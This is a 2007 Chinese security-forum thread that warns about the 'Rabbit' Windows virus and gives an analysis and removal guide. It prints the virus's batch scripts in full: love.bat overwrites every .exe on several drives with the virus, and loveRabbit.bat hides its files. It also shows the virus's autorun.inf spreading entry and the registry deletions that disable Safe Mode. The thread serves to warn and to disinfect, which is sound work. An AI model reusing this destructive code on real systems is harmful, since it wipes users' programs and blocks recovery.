设为首页收藏本站官方微博
开启辅助访问 切换到窄版

飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

[x86]PYG官方Dll优雅破解补丁制作工具[x64]PYG官方DLL优雅破解补丁制作工具[x86]PYG官方Exe优雅破解补丁制作工具[x86/x64]Baymax Patch Tools
返回列表 发新帖
查看: 2935|回复: 1

警惕“兔宝宝”病毒(兔子图标)

[复制链接]
不懂破解

该用户从未签到
发表于 2007-4-17 09:43:28 | 显示全部楼层 |阅读模式





警惕“兔宝宝”病毒(兔子图标)

自打熊猫烧香之后,病毒流行改图标了。最新的一个病毒是将图标改为兔子(如图),号称兔宝宝病毒。大家要警惕。
病毒是个兔子的图标,这是个行为极其恶劣的病毒
1.破坏安全模式
2.导致系统无法关机 重启 注销
3.直接替换exe文件
4.导致冰刃 sreng SSM等安全工具无法运行
目前所有杀毒软件都还无法查杀

运行文件后:
释放如下文件
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
在进程里有两个 互相监视 不断调用cmd.exe (用以执行C:\WINDOWS\system32\love.bat和
C:\WINDOWS\system32\loveRabbit.bat的内容)和attrib.exe

C:\WINDOWS\system32\loveRabbit.bat内容如下
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
不断为这些文件加上系统和隐藏属性

C:\WINDOWS\system32\love.bat内容如下
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y
"C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y
"C:\WINDOWS\system32\Rabbit.exe" "%%i"

把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
把C:\Program Files所有exe 做一个列表 放到c:\windows\msconfig1.inf
然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe(正在运行的不替换)

每个分区下面释放一个Rabbit.exe和一个autorun.inf
autorun.inf 内容
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
达到双击运行之目的
右键增加 “自动播放”

注册表方面:
增加HKLM\SOFTWARE\Microsoft\Active Setup\Installed
Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath
指向C:\WINDOWS\system32\JK.exe (这项应该导致他的开机启动,本人水平有限,不懂这
项注册表,望大家指教)

删除键
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-0800
2BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-0800
2BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-
08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-
08002BE10318}
删除值
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-0800
2BE10318}\: "DiskDrive"
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-0800
2BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-
08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-
08002BE10318}\: "DiskDrive"

达到破坏安全模式的目的

另外此病毒会破坏冰刃 sreng 的运行(即便将他们改名,我测试时候就是改成了fdfdsfds.bat,可照样被结束,不知道原理还..)

测试病毒时候 SSM也没有任何反映 机器直接卡死

而且导致机器无法重启 注销 关机

另外 病毒体内留下文字:
I LOVE Rabbit ,and you ? look http://z8232****.diy.myrice.com/Rabbit.htm (摘自艾玛博客里的分析,感谢)
此病毒行为比较恶劣 不过我想应该是个病毒的雏形或是恶意文件 还没有公开
不过如果被黑客利用来网上挂马或者制作大量变种 后果将不堪设想
因为病毒是替换的文件 而不是感染文件 所以杀毒软件连修复的机会都没有...

--------------------------------------------------------------------------------

兔子病毒的分工工作模式和清理方法 by dikex

工作模式:

兔子的几个文件之间存在明显的分工合作关系:

当病毒原文件Rabbit.exe被执行后,会在system32下释放出loveRabbit.exe、jk.exe和
love.bat,并执行loveRabbit.exe和love.bat

先看看下面love.bat的内容吧,列出defgh分区和program files的exe文件的列表
c:\windows\下的msconfig.inf和msconfig1.inf,并用两个for命令调用copy命令把列表中
的exe文件全部用Rabbit.exe替换掉!需要知道这个行为比熊猫和硬盘杀手还有恨,这样丢
失的数据基本上是找不回来的!

FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y
"C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y
"C:\WINDOWS\system32\Rabbit.exe" "%%i"

其中loveRabbit.exe是比较关键的一个进程,这个病毒的大部分工作是由它做的,它负责在
system32下生成msexch400.dll并插入winlogon.exe进程;不断生成loveRabbit.bat和DEFG
分区根目录下面的autorun.inf文件,并执行不断loveRabbit.bat;
删除注册表项
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-0800
2BE10318}和
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-0800
2BE10318},不断添加注册表项HKLM\SOFTWARE\Microsoft\Active Setup\Installed
Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath;而且它还能关闭
icesword和sreng等安全软件;它还能对安全模式的键值作出检查,如被修复了它立刻删除
相关键值;

另外一个批处理就是被loveRabbit.exe不断执行的loveRabbit.bat,作用是不断的将病毒文
件设置系统和隐藏属性;

attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf

而被插入msexch400.dll模块的winlogon.exe的线程数会不断上升,干扰正常的关机和注销
,并在loveRabbit.exe被结束时由winlogon.exe重新启动;

至于jk.exe的工作就简单多了,它运行后会检查loverabbit.exe是否被关闭,如关闭了就重
新运行它,之后便退出,是用于系统启动时激活病毒的进程;

还有就是在各个分区下面的autorun.inf和rabbit.exe,用于双击进入分区时重新激活病毒


明显的分工,编写者的思路很清晰,启动用的jk.exe、主要工作进程loverabbit.exe、插入
模块msexch400.dll和两个bat文件等,各有各做的事情,合作起来使得运行后病毒很难会被
结束掉;

--------------------------------------------------------------------------------

清理办法:

由于它的进程守护太好了,要关闭它实在不容易,而且安全模式被破坏了,就只有另外想办
法了……
方法一:这个病毒有个疏忽的地方,就是jk.exe不能靠loverabbit.exe进行修复,而这个是
系统启动是激活病毒用的,这就给了我们一个机会了;首先到system32文件夹下面删除
jk.exe,不过病毒把系统大部分的exe文件都替换了,所有启动项里面一定要先进行清空然
后才重启,由于病毒控制了winlogon.exe进程导致不能正常重启,所以我们就用不经过
winlogon.exe的重启方式吧,打开任务管理器,然后按着ctrl再选择任务管理器的关机菜单
里面的重启,这样就重启成功了,重启完成后正式清理;

方法二(推荐):映象劫持,最近学回来的东西,嘻嘻;注册表文件的内容如下,将其导入
注册表并结束loverabbit.exe进程之后就可以正式清理了;

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\loverabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\rabbit.exe]
"Debugger"="dikex.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\jk.exe]
"Debugger"="dikex.exe"

正式清理:首先到文件夹选项把所有隐藏文件都显示出来,之后删除下面的文件,其中
msexch400.dll需要重启或者使用unlocker等工具删除:
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
各个分区根目录下面的rabbit.exe和autorun.inf文件

在我的电脑里面搜索*.exe,把变了兔子图标的文件全部删除(他们无法挽救的了,节哀吧……)

最后删除注册表HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\下面的
{4bf41072-b2b1-21c1-b5c1-0305f4155515},导入下面注册表信息:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325
-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325
-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-
E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-
E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"

Quote:
PYG19周年生日快乐!
回复

使用道具 举报

♂冰风♀兴

该用户从未签到
发表于 2007-4-19 19:35:09 | 显示全部楼层
谢谢楼主提醒……
PYG19周年生日快乐!
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 加入我们

本版积分规则

快速回复 返回顶部 返回列表